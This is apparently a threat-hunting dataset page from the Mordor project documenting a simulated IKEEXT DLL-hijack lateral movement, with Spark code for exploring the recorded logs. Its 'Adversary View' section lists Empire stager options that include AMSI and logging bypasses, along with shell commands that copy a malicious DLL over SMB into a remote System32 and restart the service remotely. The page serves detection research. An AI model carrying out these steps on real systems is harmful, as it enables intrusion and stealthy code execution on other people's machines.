# IKEEXT Remote Service DLL Hijack

## Metadata

| Field | Value |
|---|---|
| Author | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2019/04/03 |
| Modification Date | 2020/09/20 |
| Tactics | |
| Techniques | ['T1574.001'] |
| Tags | ['Remote Service DLL Hijacking', 'RPC over SMB Svcctl'] |
## Dataset Description

This dataset represents an adversary copying a DLL over SMB (the C$ administrative share) into the System32 directory of a remote host, into the search path of a service that is vulnerable to DLL hijacking (IKEEXT, which looks for wlbsctrl.dll), and then stopping and starting that service remotely over RPC (svcctl) so that it loads the planted DLL. This dataset includes
## Datasets Downloads

| Dataset Type | Link |
|---|---|
| Host | |
| Network | |

## Simulation Plan

| Environment | Tool Type | Module |
|---|---|---|
| Mordor shire | C2 | manual |
## Adversary View

```
(Empire: agents) > usestager windows/dll
(Empire: stager/windows/dll) > info

Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value              Description
  ----             --------    -------            -----------
  Listener         True        http               Listener to use.
  Language         True        powershell         Language of the stager to generate.
  Arch             True        x64                Architecture of the .dll to generate
                                                  (x64 or x86).
  StagerRetries    False       0                  Times for the stager to retry
                                                  connecting.
  UserAgent        False       default            User-agent string to use for the staging
                                                  request (default, none, or other).
  Proxy            False       default            Proxy to use for request (default, none,
                                                  or other).
  ProxyCreds       False       default            Proxy credentials
                                                  ([domain\]username:password) to use for
                                                  request (default, none, or other).
  OutFile          True        /tmp/wlbsctrl.dll  File to output dll to.
  Obfuscate        False       False              Switch. Obfuscate the launcher
                                                  powershell code, uses the
                                                  ObfuscateCommand for obfuscation types.
                                                  For powershell only.
  ObfuscateCommand False       Token\All\1        The Invoke-Obfuscation command to use.
                                                  Only used if Obfuscate switch is True.
                                                  For powershell only.
  AMSIBypass       False       True               Include mattifestation's AMSI Bypass in
                                                  the stager code.
  AMSIBypass2      False       False              Include Tal Liberman's AMSI Bypass in
                                                  the stager code.
  ScriptLogBypass  False       True               Include cobbr's Script Block Log Bypass
                                                  in the stager code.
  ETWBypass        False       False              Include tandasat's ETW bypass in the
                                                  stager code.

(Empire: stager/windows/dll) > back
(Empire: agents) > agents

[*] Active agents:

 Name     La Internal IP   Machine Name   Username             Process     PID   Delay   Last Seen            Listener
 ----     -- -----------   ------------   --------             -------     ---   -----   ---------            ----------------
 GCSKD17Z ps 172.18.39.5   WORKSTATION5   *THESHIRE\pgustavo   powershell  1112  5/0.0   2020-09-22 03:51:02  http

(Empire: agents) > interact GCSKD17Z
(Empire: GCSKD17Z) >
(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll
[*] Tasked agent to upload wlbsctrl.dll, 124 KB
(Empire: GCSKD17Z) > shell COPY .\wlbsctrl.dll \\WORKSTATION6\C$\Windows\System32\wlbsctrl.dll
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 3
(Empire: GCSKD17Z) >
..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 stop IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 4
(Empire: GCSKD17Z) >

SERVICE_NAME: IKEEXT
        TYPE               : 30  WIN32
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x1388
..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 query IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 5
(Empire: GCSKD17Z) >

SERVICE_NAME: IKEEXT
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 start IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 6
(Empire: GCSKD17Z) >

SERVICE_NAME: IKEEXT
        TYPE               : 30  WIN32
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 6172
        FLAGS              :
..Command execution completed.

(Empire: GCSKD17Z) >
```
## Explore Mordor Dataset

### Initialize Analytics Engine

```python
from openhunt.mordorutils import *
spark = get_spark()
```

### Download & Process Mordor File

```python
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
```

```
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
```
### Get to know your data

```python
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
```

```
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|MORDORDC.theshire.local    |Security                                |4658   |768  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |508  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |466  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |409  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |386  |
|MORDORDC.theshire.local    |Security                                |4656   |384  |
|MORDORDC.theshire.local    |Security                                |4690   |384  |
|MORDORDC.theshire.local    |Security                                |4663   |367  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |328  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |286  |
|MORDORDC.theshire.local    |Security                                |5447   |192  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |176  |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4103   |169  |
|MORDORDC.theshire.local    |Windows PowerShell                      |800    |169  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |158  |
|MORDORDC.theshire.local    |Security                                |5156   |123  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |92   |
|MORDORDC.theshire.local    |Security                                |5158   |89   |
|WORKSTATION5.theshire.local|security                                |5158   |76   |
|MORDORDC.theshire.local    |Security                                |4703   |72   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
```